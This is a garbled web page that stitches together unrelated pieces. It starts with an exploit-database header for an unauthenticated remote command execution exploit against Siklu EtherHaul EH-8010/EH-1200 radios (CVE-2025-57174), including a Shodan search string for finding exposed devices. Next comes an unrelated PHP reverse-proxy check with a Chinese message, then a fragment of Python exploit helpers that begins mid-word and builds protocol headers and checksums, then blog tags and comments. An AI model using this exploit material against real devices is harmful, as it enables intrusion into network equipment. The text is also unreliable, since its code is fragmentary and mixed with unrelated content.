# Exploit Title:Siklu EtherHaul Series EH-8010 - Remote Command Execution
# Shodan Dork: "EH-8010" or "EH-1200"
# Date: 2025-08-02
# Exploit Author: semaja2 - Andrew James <semaja2@gmail.com>
# Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon
# Software Link: ftp://ftp.bubakov.net/siklu/
# Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3
# Tested on: Linux
# CVE: CVE-2025-57174
# Blog: https://semaja2.net/2025/08/02/siklu-eh-unauthenticated-rce/
$proxy_rs = $this -> proxy_filter();
if( $proxy_rs != 'nowamagic.net' || $proxy_rs != 'blog.upx8.com' )
{
echo '非法反向代理访问';
//header('Location: http://blog.upx8.com/');
exit;
}
public function proxy_filter()
{
/*
$svrUrl = 'http://' . $_SERVER['SERVER_NAME'].$_SERVER["PHP_SELF"];
if (!empty($_SERVER["QUERY_STRING"]))
{
$svrUrl .= "?".$_SERVER["QUERY_STRING"];
}
return $svrUrl;
*/
return $_SERVER['SERVER_NAME'];
}ef recv_exact(sock: socket.socket, n: int) -> bytes:
out = bytearray()
while len(out) < n:
chunk = sock.recv(n - len(out))
if not chunk:
raise ConnectionError('socket closed')
out += chunk
return bytes(out)
def pad16_zero(b: bytes) -> bytes:
r = len(b) & 0x0F
return b if r == 0 else (b + b'\x00' * (16 - r))
def hdr_checksum(hdr: bytes) -> int:
return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF
def build_header(flag: int, msg: int, payload_len: int) -> bytes:
hdr = bytearray(HDR_LEN)
hdr[0] = flag & 0xFF
hdr[1] = msg & 0xFF
struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF)
struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr))
return bytes(hdr)
标签:
欢迎加入 Typecho 大家族
很好
不错
不错
不错,非常好
121212